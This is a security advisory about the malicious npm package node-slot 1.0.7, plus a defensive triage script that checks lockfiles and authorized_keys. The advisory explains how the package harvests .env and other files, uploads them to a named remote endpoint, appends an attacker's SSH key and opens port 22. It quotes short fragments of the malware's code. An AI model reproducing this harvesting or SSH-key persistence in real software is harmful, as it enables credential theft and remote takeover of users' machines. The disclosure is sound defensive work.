Malicious package

node-slot (npm)

Malicious code in node-slot (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6191
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall node-slot

What this malware does

node-slot 1.0.7 contacts https://datasecure-service.vercel.app/api/v1 to retrieve scan and block patterns, then walks the user's home directory (or non-C: drives on Windows) for files matching extensions such as .env, .json, .toml, .pdf and .docx. It uploads the matches via multipart POST (axios.post(UPLOAD_URL, form, ...) at index.js:78) along with the OS username and platform.

On Linux it additionally fetches an attacker-supplied SSH public key from /api/ssh-key and appends it to ~/.ssh/authorized_keys (fs.appendFileSync(authKeys, sshKey + "\n", { mode: 0o600 })), then runs sudo ufw enable and sudo ufw allow 22/tcp to ensure the operator can reach the SSH service. This grants persistent remote shell access to the installer's machine. Uninstalling the package does not undo either change.

Server-controlled scan/block patterns let the operator retarget the harvester without republishing. package.json has empty author/description and lists Node built-in names (child_process, os) as fake dependencies, a disguise consistent with a deliberately malicious package.
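A triage check for the two things described above, as an added example that is not part of the advisory or of any vendor tooling: it finds node-slot anywhere in a parsed package-lock.json (v1, v2 or v3, including aliased installs) and lists authorized_keys entries that are not on a known-good list. The function names, the sample lockfile and the sample keys are constructed for illustration; the known-good key list is assumed to be maintained by the machine's owner.

```javascript
// Added example; the SAMPLE_* inputs at the bottom are constructed, not real data.
const FLAGGED = { name: "node-slot", versions: new Set(["1.0.7"]) }; // values from this page
// Lockfile v2/v3 has a flat "packages" map keyed by install path; v1 has only a
// nested "dependencies" tree. v2 carries both, so prefer "packages" to avoid duplicates.
function findInLockfile(lock) {
  const hits = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === "") continue; // root project entry
      // "name" is present when the package is installed under an alias
      const name = meta.name || path.split("node_modules/").pop();
      if (name === FLAGGED.name) hits.push({ path, version: meta.version });
    }
  } else {
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const here = trail.concat(name);
        if (name === FLAGGED.name) hits.push({ path: here.join(" > "), version: meta.version });
        walk(meta.dependencies, here);
      }
    };
    walk(lock.dependencies, []);
  }
  return hits.map((h) => ({ ...h, flagged: FLAGGED.versions.has(h.version) }));
}

// authorized_keys lines are "[options] keytype base64 [comment]". Compare on
// "keytype blob" so an edited comment or added options cannot hide a key.
const KEY_RE = /(?:^|\s)((?:ssh-|ecdsa-sha2-|sk-)[\w@.-]+)\s+(AAAA[A-Za-z0-9+/=]+)/;
function unexpectedKeys(text, knownGood) {
  const allowed = new Set(knownGood);
  const out = [];
  text.split(/\r?\n/).forEach((line, i) => {
    if (line.trim().startsWith("#")) return;
    const m = KEY_RE.exec(line);
    if (m && !allowed.has(`${m[1]} ${m[2]}`)) out.push({ line: i + 1, key: `${m[1]} ${m[2]}` });
  });
  return out;
}

const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", version: "0.1.0" },
  "node_modules/left-helper": { version: "2.0.0" },
  "node_modules/left-helper/node_modules/node-slot": { version: "1.0.7" },
  "node_modules/slots": { name: "node-slot", version: "1.0.6" } } };
const GOOD = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyConstructedForExample";
const SAMPLE_KEYS = `# managed by ops\n${GOOD} alice@laptop\nssh-rsa AAAAB3NzaC1yc2EConstructedUnknownKey\n`;
console.log(findInLockfile(SAMPLE_LOCK), unexpectedKeys(SAMPLE_KEYS, [GOOD]));
```

Any key it reports should be traced to an owner before it is kept; a hit on the lockfile means the secrets reachable from that build or host need rotating, as stated under Immediate action.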

Malicious versions

1 flagged
1.0.7

Indicators of compromise (SHA-256)

91f23a964fca4e1984aecce2dbc51fc6bfa1ffe77725ee5f0e8d2f7a5c5514d8

Frequently asked questions

No. node-slot on npm has been identified as a malicious package (version 1.0.7 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007056

Credits

  • Amazon Inspector · finder

node-slot (npm) malicious package — MAL-2026-6191 | O3 Security